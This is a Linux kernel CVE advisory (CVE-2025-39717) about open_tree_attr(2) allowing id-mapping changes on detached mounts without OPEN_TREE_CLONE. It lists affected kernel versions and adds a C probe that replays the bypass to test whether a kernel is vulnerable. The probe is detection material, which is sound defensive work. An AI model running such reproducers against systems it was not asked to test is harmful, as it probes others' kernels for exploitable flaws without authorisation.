CVE-2025-39717

Severity CVSS v4.0:
Pending analysis
Type:
CWE-416 Use After Free
Publication date:
05/09/2025
Last modified:
25/11/2025

Description

In the Linux kernel, the following vulnerability has been resolved:

open_tree_attr: do not allow id-mapping changes without OPEN_TREE_CLONE

As described in commit 7a54947e727b ('Merge patch series "fs: allow changing idmappings"'), open_tree_attr(2) was necessary in order to allow for a detached mount to be created and have its idmappings changed without the risk of any racing threads operating on it. For this reason, mount_setattr(2) still does not allow for id-mappings to be changed.

However, there was a bug in commit 2462651ffa76 ("fs: allow changing idmappings") which allowed users to bypass this restriction by calling open_tree_attr(2) *without* OPEN_TREE_CLONE.

can_idmap_mount() prevented this bug from allowing an attached mountpoint's id-mapping from being modified (thanks to an is_anon_ns() check), but this still allows for detached (but visible) mounts to have their id-mapping changed. This risks the same UAF and locking issues as described in the merge commit, and was likely unintentional.
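
The following C probe is an added example, not part of this advisory or of the kernel's own code. It replays the sequence the description rules out: clone a path into a detached mount with open_tree(2), then call open_tree_attr(2) on that detached mount with MOUNT_ATTR_IDMAP set but without OPEN_TREE_CLONE. A kernel with the bug accepts the request and returns a new fd; a fixed kernel refuses it. The helper names (probe_cve_2025_39717, idmap_change_permitted, probe_mount_attr) are mine; the constants and syscall numbers are the UAPI values, redefined locally so the file builds against older userspace headers. Assumptions: the fixed kernel answers with EINVAL (the exact errno is not stated on this page), the caller is root or holds CAP_SYS_ADMIN over the mount namespace, and the user-namespace fd refers to a non-initial user namespace (for instance `/proc/PID/ns/user` of a process started with `unshare -U --map-root-user sleep 300`), since id-mapping a mount to the namespace that already owns its filesystem is rejected for unrelated reasons. On a vulnerable kernel the probe really does id-map the detached mount, but the mount is never attached anywhere and is dropped when the fds are closed.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* UAPI values (include/uapi/linux/mount.h, linux/fcntl.h), defined locally so
 * the probe builds against userspace headers that predate Linux 6.15. */
#define PROBE_OPEN_TREE_CLONE   1u
#define PROBE_MOUNT_ATTR_IDMAP  0x00100000u
#ifndef AT_EMPTY_PATH
#define AT_EMPTY_PATH 0x1000
#endif
#ifndef __NR_open_tree
#define __NR_open_tree 428          /* syscall numbers >= 403 are arch-independent */
#endif
#ifndef __NR_open_tree_attr
#define __NR_open_tree_attr 467     /* open_tree_attr(2), new in 6.15 */
#endif

/* Same layout as the UAPI struct mount_attr (MOUNT_ATTR_SIZE_VER0 = 32 bytes). */
struct probe_mount_attr {
    uint64_t attr_set;
    uint64_t attr_clr;
    uint64_t propagation;
    uint64_t userns_fd;
};

/* The rule the fix enforces, as stated in the description: open_tree_attr(2)
 * may change a mount's id-mapping only while it is also cloning the mount.
 * Returns 1 if the request is acceptable, 0 if it must be rejected. */
int idmap_change_permitted(unsigned flags, uint64_t attr_set)
{
    if (!(attr_set & PROBE_MOUNT_ATTR_IDMAP))
        return 1;                                 /* no id-mapping change asked for */
    return (flags & PROBE_OPEN_TREE_CLONE) ? 1 : 0;
}

static int sys_open_tree(int dfd, const char *path, unsigned flags)
{
    return (int)syscall(__NR_open_tree, dfd, path, flags);
}

static int sys_open_tree_attr(int dfd, const char *path, unsigned flags,
                              struct probe_mount_attr *attr, size_t size)
{
    return (int)syscall(__NR_open_tree_attr, dfd, path, flags, attr, size);
}

/* Replays the bypass: clone `src` into a detached mount, then ask
 * open_tree_attr(2) to id-map that detached mount WITHOUT OPEN_TREE_CLONE.
 * Returns 1 if the kernel accepted it (vulnerable), 0 if it refused (errno is
 * preserved for the caller), -1 if the probe itself could not run. */
int probe_cve_2025_39717(const char *src, int userns_fd)
{
    int detached = sys_open_tree(AT_FDCWD, src, PROBE_OPEN_TREE_CLONE | O_CLOEXEC);
    if (detached < 0)
        return -1;

    struct probe_mount_attr attr = {
        .attr_set  = PROBE_MOUNT_ATTR_IDMAP,
        .userns_fd = (uint64_t)userns_fd,
    };
    /* Deliberately no OPEN_TREE_CLONE: this is exactly what the fix rejects. */
    int fd = sys_open_tree_attr(detached, "", AT_EMPTY_PATH | O_CLOEXEC,
                                &attr, sizeof attr);
    int saved = errno;
    if (fd >= 0)
        close(fd);                                /* drops the id-mapped detached mount */
    close(detached);
    errno = saved;
    if (fd >= 0)
        return 1;
    return saved == ENOSYS ? -1 : 0;              /* ENOSYS: no open_tree_attr(2) at all */
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <path-on-a-mount> </proc/PID/ns/user>\n", argv[0]);
        return 2;
    }
    int userns_fd = open(argv[2], O_RDONLY | O_CLOEXEC);
    if (userns_fd < 0) {
        perror("open user namespace");
        return 2;
    }
    int r = probe_cve_2025_39717(argv[1], userns_fd);
    int err = errno;
    if (r < 0) {
        fprintf(stderr, "probe did not run: %s\n", strerror(err));
        return 2;
    }
    if (r == 1)
        puts("VULNERABLE: id-mapping changed without OPEN_TREE_CLONE");
    else
        printf("rejected (errno %d: %s); EINVAL is the expected answer from a fixed "
               "kernel, EPERM/EBADF point to a setup problem\n", err, strerror(err));
    return r;
}
```

Only a returned fd is a trustworthy positive signal. A refusal should be read together with errno: EPERM or EBADF means the probe's own setup (privilege, namespace fd) was wrong, not that the kernel carries the fix. ENOSYS means open_tree_attr(2) does not exist on that kernel, which places it before the affected 6.15 range.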

Vulnerable products and versions

CPE                                                 From                Up to
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*        6.15 (including)    6.16.4 (excluding)
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*   -                   -
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*   -                   -